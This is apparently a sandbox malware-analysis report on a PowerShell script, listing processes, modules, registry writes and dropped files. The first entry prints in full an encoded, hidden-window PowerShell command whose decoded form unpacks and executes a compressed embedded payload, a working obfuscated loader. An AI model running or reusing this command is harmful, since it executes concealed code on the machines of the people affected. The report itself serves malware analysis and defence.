3236"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAYwAzAFkASABCAEEAYQBrADQAUwBXAE0AbwB5AFEAWgBXAEoAaQBMAEoAQgBrAGcAMwBQAHQAZgA3ACsAVgBqAFMAbQA5AEoAbgBlAGQAdQBjAHMATQBFADEAbgBhAFgAZQAwACsAKwArAHkAdQBIAEMAcABMAGoAdQBRACsAawBYADMAbQBVAGwAUwA2AHAAMQB6ADQATABFAFQAbgBoAGMASgBwAGkAOQBrAFMAWABhAE0AUABXAHMARwBMAFEAaQBMAFYAdABsAHIATQBGAGwAVABPADEAcAB5AFIARwBYAFoAZABUAG8AVgBBAGYAeABaAE8AaABwAGoAagBGAGQASgBQAFkAOAB4AG4ASwArAFoARwBBAFMAMgBpADkARQBNAEoAVQBqAGYAaQAxAEQAZwA1AEsAWgB5AGsAVwAxAEUAbwBzAEUAZABuAEkAWgBaACsAVABHAGMAcgBLAGgAKwBaAEsAKwBBAGkAZgBWAEoAZgByADEAdABzAGgAZgAxAHcAKwB2ADUAOQBNACsASwBjAGgAagBMADcATABuAGUAbwByAEEAdABCAFYALwBQAEEAcAAwAEkAMwAwAEYAZgAwADgARQBnADUATABkADMATQBsADUAUgBJADkAQwBjADYAbgBaAFUANwBBAFoAdgBqAFkAQwArAFcATgBEAEYANQBoAEkARABxAG8AYQB2AE8AZQBvAHgAZwBGAFUASABaAFcAUQBlACsAMQBMAFUAdgBYAHoAUgBqAFUAagBxAGIAbAB0AHUAYgBDAEEAZABDADEANQB4AEUAUwBMAG8AcQB1ADAARwBnAEcAZQBpAGIAbwBTADQAYwBKAFcAdQBxAGEAMwAyAGYAYwBDAGEAWQBKADgAcwBQAGYAbABnADkATAA5ACsAbAAzAGcAOQBTADUALwB1AFoANwA1AHEAeABqADIAeQB4AHgAaABEAEgANgAwAEUAcQBxADUAbQBPAHIAcwBGAHkAQwBOAGoAVQBNAHcAeQAxAEkAcABxAG8AKwB5AGIAVABLAGYAcAB3ADgATwBZADIAQwBxAFcALwBvAG0AVQA3AGwASgBTAHoAdABVAE4ANQA3AEIATQBxAHkAaABZAE8AMwBZAEQAZQBVAGcALwBVAE4AQQBIAHAAQwB4AGUAYQBBAFUANQB3AEsAaQBNAGUAbwB0AHcAWAAwAEkAdgBaAEUAOQBWAFAAdwB5AGcASQBpAG0AQgAzADgAcQB0ADIAcAAvAHEAQQBiAG4ATgB3AGYAMQBWAEoAUAAxAFkAQwBxAGEASABrAFIAbgBIAFAAaQBWACsAQgBvADUALwB5AEoAagBNAEgANABmAHoAawAvAFIARwA1AEQAUABqADcAaQBXAEIARwA0AFYAdgBoAEIAYQBxADYATgBLAEEATABMAE8AbABNAEEAcgA1AEgAWABDADIAYwBuAEUAegBTAEoAWQBWADQAOQBDAEUAVABmAHEAcAAzAGoAUwBwAEYAMQBBAGMAbgBzAEcAUQA4AFUAZQBrAGMAOABZAGcAYQAwACsALwA1AHkAYQA3AE4ATgBVAFgAeABWAFUATgBuAHUAZABaAGUASgAwAHQAUAA1AHMAYwAxAG0AdAB3AHoAMwA1ADAAVwBUAG8AegBDAG4AagAxAHEAZgB6AGEAUAAvAE0AQwBsAFgASgAyAC8AWABnADAAdAA2AHYAawBoAGIAUwBVAGgAWAB2AGsAawBKADcAegArAFUAcwA2AG8ARgA5AEEAVQBqADMASQB1AE4AZwBBAC8AZABXADEALwBRAE4AMwBXAEgAaAAxAE4AQQBUAHIANQBXAGEAMgA5ADgAdQBWAEIAdAA1AEUANQBWAHkAZQBRAGQAdwBGAGUAQQBTAFcATQBIADUAMwBKAGMAcQBoAHIAZAB0AGkAbgBLADgAQQB2ACsAdwBhAGEAbgBuAHAAUQBaAGoAUwBYADMAcABkAFcAawB0ACsAdQB2AGgAVwBYAG0AdwBFAFcAbwBvAGkARwBFAGQAUQA1AEsAUwBLAEgANABvAEMANgBSAFYAUQBQAGgAYgA4AC8AcQBrAGUAUwBwAFUAdgB0AHUANwB2ADkASwBKAEEAKwB3AFUATABtADUAcQBiAEcAQwA1AEQAdQByADIANgB5AEUAQwBvAG0ASQBwAEIAZABnAEcASABrAHIAQwBuAHgAYwBhAEIAUQBLAFMATABMAGQAMgBrAGoAYwBmAHgARgA3AG8ATAAyAEkAaQBaAE4ASABBAFIAUQBjAG0AQQBwAGgAcAB6AEEAagBzAEwAQwBrAFkAbwB6ADMAQwAzACsAbgBSADkARwAyAGEASABTAFgAcQAwAEQAdQBnAEwAcAB0AEEAdQBaAEEAVgA1AEEAegA5AGwAWABWAEUAbwAzAHYASwBDAHUAOQBnADkAdQA1ADMAVwBTAEYAWQBYAEMASwBnAGYAcAB5AEcAawBnAGcAQgBNAHcAVwBVAFQAMwBQAHAAZgBRADEANwBUAGkAVAA4AFQANwBiACsANwA5ADIARwBKACsAYwBMAFAASgA2AFQANgBSAGUAbABxAEkAawAwAFkAaQBWAGIAbQBrAGsAawBRAE4AbAArAHMARABsAGkAbAB5AFgAQQBKAHEASgBtAGUAcgBCAGgAYgAwADgAcwBKAEoAMgA1AGkAdQBWAGEAKwBpAGoAWgAzADAAbAB4ADgAdgBlAGEAYwBkAG0AOQBiAEcAYQBvAC8AZwBGADgATwB2AHUAagBIAGIAdgBWADcAMwBkAHQAMgA0ADcAWgBGADIAZABEAE8AMABLAGwAMwBQAC8AbgBqAFYAdQBvAGkAMgBrAFIAMgBOAEcAcABXAHEAVwBRAEcANQA1ADAAMgBuADcAZABuAHgARABmAHQAMABGAHEAMAB1AHoAdAB5ADEASABRADkAZwBUADcAegBiAFcASwBKAGwAeAA2ADIANgBkAGIANQBoADUAdQBYAEMAcgArADMAdABaAFAAbwBmADUAOQB1AHoAKwBkAGcAMgAzADgAMAA3ADUAbwBWADEATAAwAHcAbABiADkAbAB4AHcAOQB3ADAAYQB3AHoAVwBiACsAMgA0AHkAYgBxAGcAZAAzAFcANQBEAGgAdABiADkANABLADIAdQA1AGQAMAAzAEMAUABiAHEAcgB5AGkAZQBMAEYATAAvAHIAaAAvADAANAA0AEcAMwBVADgAVgBzAGUAeABEAEQARQA3AHQAbQBYAFMAYgBnADYANQBkAGsAZQA4AGUAcQA2ADEATwBkAGYAagA1AE8AVwBGAGkAYQBTAGUARAAzADkAcgBSAE8AaQBGAFAAWQB2AG0AVQBrAEsAVwBUADMASQB5ADYAQwBjAGcAOQBQAFEAVwBPADAAOQBnADUANQA1ADkASABiADQAYwBlAHEAWQBVADMAYgBMAEIAMQB1ADMAYgBWADcARABVAHIATwA3AHAAMQBuADgALwBYADAAVwBBADgAdQBuAHQAYQBPAGcANwBJAFgAMwBLAFQAMwBkAHkARgBHADkARgBaAFgARABnAFIARwAyADkASgBEAFAAdABuAGoAdQBQAHUAWABBAGcAcwBIAGkAZQBmAHEAawBQAE0AMwBDADEANQBUAHYAZQBUAGYAZwB2AHUAUABqADQARABmAEUAaAAxADAANwBtAHkASQBLADYAdwBrAGYAVAA0AHgAaQBlAEEATwBiAEgANgBTAGUAOAB4AEcAVABxAHAAVABiAGMAZABMADgAKwA5AGQAeAA3ADQAWAAzAEgAZQBQAEoAeQB0AEwAWQB2AFUATgBpAEIALwArAFIAZwAzAEUAbwBFAHYAQQB2AEwAawAxAEcANABlAEYAdQBNAHgAcQBjAG0AZAAxAFgAZwBlADkAcwBqAGcAbQBWAFMAdAAyAHQAdgBXAHUARABaAHkAZwBrAEgASABxADkAUwBHAGQANgBZADUAKwBtAGgAdAB4ACsAYgB1ADAANABOAGQARwBWAGgAWAA0AC8ANgAxAFkAcABYAEgATwBNAHkASgBuAGUAcQA5AHYAeQBQADQAWAB3AG8AawBPAHYAQQBHADIAQQBKAEUAVgBQAHQAdgAzAGgAaQBxAGYAeAA5AE8ASgBxAGUANwBhAFQANQB2AEQAOQArAGwAKwBRADYAcwBWAFgAOQBUAEgARQB4AFAAWQBuAHoARQB2AE4AZQBHAFcAQgA5AHoAOABZAGcARABZAEMAUQBNAG8AcgB5AE4AbQBJAHkAYgArADMARQB5AFoATAA3AFMAMABQAFcAWABYADAAQgBQAGwASQBjADAAZwBOAGMAQgB2AEIALwB5ADQAcQBzAEgAQQBTAE4AcQBBAEwANAB5AGkAVwBBAGMAWgAwAE4AeQBDAGsAMwBtAEQAcABiAFYAOAB4AGQAWABCAGoAbwBJAHcAdABUAEwAWQBwAHAASABuAHAAYwBPAGkAWAAyAEUAKwBhAHoATQBCAGQAKwAvAC8AdwB6AGgARgBZADkAQQA3AE4ARgB3AEkAUgArAEwAcQBMAEsAcgBWAGkAbwBWADkAZgArAGkAWQBoAFIAKwBIAFoAWQBtAFcAeQBmADYAdwBWAHgAUgBEAGMAawBqAFQANAA1AHYAQwB0AEsAYgBqAEQAMwA2AFAAQQBwAFgAOQBIADkATQB3AEEAKwBYAC8AagB1ADAAQwByAHgAMAB6AGgANgBnAFMAeAAxADYARwBTACsAagBvAEgAMABvAEYARwB3AFAASABlADAATAAvAHgAbABlAGsAWABTAEQAcgBsAEwAdQBDAFkAbQA1AEwAQwAzAFoASABKADYAYwBhAFEALwBWAFQANwBHAEIANwBQAFkAWQBuAFcATAAwAEQAWgBVAGcAdgBMAHEAbwBuAHMATwA3AGsAeQA4AGkAMQBWAEIAUgA5AG8AegArAGkAcgBiAFkAegB4AFMALwBvAGwAdABLAEsARAB5AEQAUwBsADAAMgBCADUAWgBTAG0ASQB2AEsAZABHAHAARQBDAGMAUABlAFgAegArAHYAZABoADYAWABDAHcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3296"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\uy23bf.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
2 228
Read events
1 765
Write events
461
Delete events
2

Modification events

(PID) Process:(2768) rundll32.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\Windows\system32\NOTEPAD.EXE
Value:
Notepad
(PID) Process:(2768) rundll32.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\PROGRA~1\MICROS~1\Office14\OIS.EXE
Value:
Microsoft Office 2010
(PID) Process:(2768) rundll32.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Value:
Microsoft Word
(PID) Process:(2768) rundll32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2768) rundll32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2768) rundll32.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2664) NOTEPAD.EXEKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:(2664) NOTEPAD.EXEKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:MRUListEx
Value:
0200000001000000000000000700000006000000030000000500000004000000FFFFFFFF
(PID) Process:(2664) NOTEPAD.EXEKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation:writeName:TV_FolderType
Value:
{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}
(PID) Process:(2664) NOTEPAD.EXEKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation:writeName:TV_TopViewID
Value:
{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Executable files
0
Suspicious files
12
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J0J0R2JGYJZOQLSVF52J.temp
MD5:
SHA256:
2468powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZNLIW7VUWK61NY07LVKY.temp
MD5:
SHA256:
3296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGPQRJAO1PST0Z3KPAEX.temp
MD5:
SHA256:
2644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PWEIRS88YTA6NODJOVVM.temp
MD5:
SHA256:
3068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZ2ODXW6MMH23Z814VNQ.temp
MD5:
SHA256:
3236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\70KZRW3TGBHD8FFGW31M.temp
MD5:
SHA256:
3296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17920e.TMPbinary
MD5:
SHA256:
3120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2664NOTEPAD.EXEC:\Users\admin\Desktop\uy23bf.ps1text
MD5:
SHA256:
2468powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF172a6b.TMPbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
Process
Message
PowerShell_ISE.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
PowerShell_ISE.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
PowerShell_ISE.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
PowerShell_ISE.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
PowerShell_ISE.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
PowerShell_ISE.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
PowerShell_ISE.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
PowerShell_ISE.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
PowerShell_ISE.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
PowerShell_ISE.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
uy23bf